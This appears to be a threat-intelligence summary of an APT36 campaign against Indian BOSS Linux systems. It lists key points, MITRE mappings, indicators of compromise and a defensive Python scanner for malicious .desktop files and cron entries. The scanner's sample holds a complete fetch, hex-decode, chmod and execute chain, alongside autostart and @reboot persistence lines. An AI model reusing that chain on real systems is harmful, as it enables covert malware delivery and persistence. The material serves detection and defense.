APT36: Targets Indian BOSS Linux Systems with Weaponized AutoStart Files

CYFIRMA reports an APT36 campaign that uses weaponized .desktop shortcut files to deliver Go-written ELF payloads to BOSS Linux systems, enabling covert download, execution, persistence, and C2 communication with domains such as securestore[.]cv and modgovindia[.]space. The operation relies on spear-phishing archives and tailored delivery to Indian government targets, resulting in data exfiltration and persistent access.

Keypoints

  • APT36 (Transparent Tribe) is conducting a targeted cyber-espionage campaign against Indian government entities using spear-phishing with archive attachments.
  • Attackers weaponize .desktop shortcut files (e.g., Meeting_Ltr_ID1543ops.pdf.desktop) that chain bash commands to download, decode (xxd -r -p), make executable (chmod +x), and run ELF payloads.
  • Malware is written in Go, delivered as ELF 64-bit binaries (e.g., Meeting_Ltr_ID1543ops.pdf-.elf) and exhibits unusual ELF header and section anomalies indicative of packing/obfuscation.
  • Malicious infrastructure includes recently registered domains securestore[.]cv and modgovindia[.]space (resolving to 45[.]141[.]58[.]199) used for hosting/downloads and C2 communications over non-standard ports.
  • Persistence mechanisms include user-level systemd service enablement, cron job pointing to .config/systemd/systemd-update, and autostart via X-GNOME-Autostart-enabled in .desktop files.
  • Observed behaviors include DNS-based C2 queries, non-blocking UDP sockets, epoll usage, futex synchronization, and attempts to exfiltrate harvested data to attacker infrastructure.
  • Mitigations recommended: email/security hardening, disabling .desktop execution from untrusted sources, EDR for Linux, DNS/outbound monitoring, IOC/YARA integration, and user training.

MITRE Techniques

  • [T1064] Scripting – Used via .desktop Exec= bash -c chaining to run download/decoding/execution commands: “the Exec field launches a Bash shell using bash -c, allowing several commands to be chained in a single line.”
  • [T1053] Scheduled Task/Job – Persistence and task scheduling implemented through cron jobs that execute ‘.config/systemd/systemd-update’ on reboot: “inserting a cron job that executes the hidden payload ‘.config/systemd/systemd-update’ on every system reboot.”
  • [T1222] File and Directory Permissions Modification – The payload uses chmod +x to modify file permissions and enable execution: “the script uses chmod +x to make the temporary file executable.”
  • [T1014] Rootkit – ELF file exhibits suspicious header/section manipulation and large NOBITS sections suggestive of rootkit-like hiding or tampering: “section headers are suspicious due to missing section names… Large NOBITS sections… used to load hidden data at runtime.”
  • [T1564.001] Hide Artifacts: Hidden Files and Directories – Malware creates hidden payload locations such as ‘.config/systemd/systemd-update’ and uses hidden filenames under /tmp: “a temporary filename inside /tmp… the hidden payload ‘.config/systemd/systemd-update’.”
  • [T1037] Boot or Logon Initialization Scripts – .desktop autostart and enabling system-update.service ensure execution at user login: “Enabling X-GNOME-Autostart-enabled=true ensures that the file automatically runs every time the user logs in.”
  • [T1546.004] Event Triggered Execution: Unix Shell Configuration Modification – Use of autostart and user-level service changes to trigger execution on login/systemd sessions: “the malware enables the system-update.service for the current user, ensuring it is automatically started during future user-level systemd sessions.”
  • [T1543.002] Create or Modify System Process: Systemd Service – Malware enables/modifies a user-level systemd service (system-update.service) for persistence: “the malware enables the system-update.service for the current user.”
  • [T1003.001] OS Credential Dumping: LSASS Memory – Listed in the report's technique mapping under credential access, though not detailed in the dynamic trace: “Credential Access T1003.001 OS Credential Dumping: LSASS Memory” (mapping entry).
  • [T1082] System Information Discovery – Malware performs system information discovery as part of reconnaissance and target profiling: “Discovery T1082 System Information Discovery” (mapping entry).
  • [T1083] File and Directory Discovery – Malware enumerates files/directories to locate data for collection: “Discovery T1083 File and Directory Discovery” (mapping entry).
  • [T1005] Data from Local System – Collection of local files for exfiltration is observed in the campaign behavior: “Collection T1005 Data from Local System” (mapping entry).
  • [T1105] Ingress Tool Transfer – Secondary payloads are downloaded from attacker-controlled domains to the host: “the script silently retrieves a hex-encoded file… from an attacker-controlled server.”
  • [T1571] Non-Standard Port – C2 communications occur over port 4000 rather than standard service ports: “modgovindia[.]space:4000… C2 communication… over port 4000.”
  • [T1001.001] Data Obfuscation: Junk Data – Hex encoding of payload (Mt_dated_29.txt) and conversion via xxd -r -p to hide binary content: “silently retrieves a hex-encoded file… piped through xxd -r -p, which converts the hexadecimal text into raw binary form.”
  • [T1095] Non-Application Layer Protocol – Use of low-level socket operations, UDP and custom DNS queries for C2 communications: “creates a non-blocking UDP socket… connects to the local DNS resolver at 127.0.0.53:53… sends DNS queries… for the suspicious domain modgovindia[.]space.”
  • [T1071] Application Layer Protocol – Malware uses application-layer protocols (HTTP) for C2 and downloads: “presence of ‘http://modgovindia[.]space:4000’ as both a string and a hex value in the malware file indicates a hardcoded command-and-control (C2) server address.”
  • [T1090] Proxy – The report's mapping lists proxy behaviour among the network techniques, with DNS and non-standard network activity used to obscure C2 routing and communication: “DNS-based reconnaissance or communication with a malicious server as part of a C2 infrastructure.”
  • [T1048] Exfiltration Over Alternative Protocol – Data exfiltration attempts over non-standard or alternative channels indicated by observed C2 and transport techniques: “The malware attempts to transmit harvested data to the attacker’s infrastructure.”
  • [T1498] Network Denial of Service – Impact mapping lists network denial techniques as a possible impact of the campaign: “Impact T1498 Network Denial of Service” (mapping entry).
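A defender-side check for the .desktop execution chain and the cron persistence described in the key points and in the T1064/T1053/T1037 entries above. This is an added example, not code from CYFIRMA or the report; the sample .desktop contents, crontab lines and the example.invalid URL are constructed here for illustration.

```python
import re
from configparser import ConfigParser

# Indicators drawn from the reported .desktop Exec chain: bash -c chaining,
# hex decoding with xxd -r -p, chmod +x, staging under /tmp, remote fetch.
EXEC_INDICATORS = {
    "shell_chain": re.compile(r"\bbash\s+-c\b"),
    "hex_decode": re.compile(r"\bxxd\s+-r\s+-p\b"),
    "chmod_exec": re.compile(r"\bchmod\s+\+x\b"),
    "tmp_staging": re.compile(r"/tmp/"),
    "remote_fetch": re.compile(r"\b(curl|wget)\b"),
}

def scan_desktop_entry(text, filename=""):
    """Return finding names for one .desktop file (contents plus its name)."""
    findings = []
    cp = ConfigParser(interpolation=None, strict=False, delimiters=("=",))
    cp.read_string(text)
    if not cp.has_section("Desktop Entry"):
        return findings
    entry = cp["Desktop Entry"]
    exec_line = entry.get("Exec", "")
    for name, pat in EXEC_INDICATORS.items():
        if pat.search(exec_line):
            findings.append(name)
    # Autostart on login is only reported when the Exec line itself looks hostile.
    if findings and entry.get("X-GNOME-Autostart-enabled", "").lower() == "true":
        findings.append("autostart_with_suspicious_exec")
    # A double extension such as ".pdf.desktop" disguises a launcher as a document.
    if re.search(r"\.(pdf|docx?|xlsx?)\.desktop$", filename, re.I):
        findings.append("document_lookalike_name")
    return findings

def scan_crontab(text):
    """Flag @reboot cron lines that run a hidden path under .config/systemd."""
    return [ln.strip() for ln in text.splitlines()
            if not ln.lstrip().startswith("#")
            and "@reboot" in ln and "/.config/systemd/" in ln]

# Constructed samples (not taken from the report); the URL is a placeholder.
SAMPLE_DESKTOP = """[Desktop Entry]
Type=Application
Name=Meeting_Ltr_ID1543ops.pdf
Exec=bash -c "curl -s http://example.invalid/Mt_dated_29.txt | xxd -r -p > /tmp/.x; chmod +x /tmp/.x; /tmp/.x"
X-GNOME-Autostart-enabled=true
"""
BENIGN_DESKTOP = "[Desktop Entry]\nType=Application\nName=Text Editor\nExec=gedit %U\n"
SAMPLE_CRONTAB = "0 2 * * * /usr/bin/backup.sh\n@reboot /home/user/.config/systemd/systemd-update\n"
```

Run it over ~/.config/autostart/*.desktop, ~/Desktop/*.desktop and `crontab -l` output on BOSS hosts; a benign launcher yields no findings, while the chain above yields every indicator plus the autostart and lookalike flags.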

Indicators of Compromise

  • [File Hash – SHA256] Malicious ELF and artifacts – 508a2bcaa4c511f7db2d4491bb76effaa7231d66110c28632b95c77be40ea6b1, 8f8da8861c368e74b9b5c1c59e64ef00690c5eff4a95e1b4fcf386973895bef1 (additional hash: e689afee5f7bdbd…)
  • [MD5 Hash] Identified payload filenames – Meeting_Ltr_ID1543ops.pdf.desktop “10b7139952e3daae8f9d7ee407696ccf”, Meeting_Ltr_ID1543ops.pdf-.elf “5bfeeae3cc9386513dc7c301c61e67a7”
  • [Domain] Malicious hosting/C2 – securestore[.]cv (used to host/download .desktop-associated files), modgovindia[.]space (hardcoded C2 and flagged malicious)
  • [IP Address] C2 server hosting – 45[.]141[.]58[.]199 (observed resolving modgovindia[.]space; monitor/block as appropriate)
  • [Filenames] Weaponized filenames and archives – Meeting_Notice_Ltr_ID1543ops.pdf_.zip, Meeting_Ltr_ID1543ops.pdf.desktop, Meeting_Ltr_ID1543ops.pdf-.elf

Read more: https://www.cyfirma.com/research/apt36-targets-indian-boss-linux-systems-with-weaponized-autostart-files/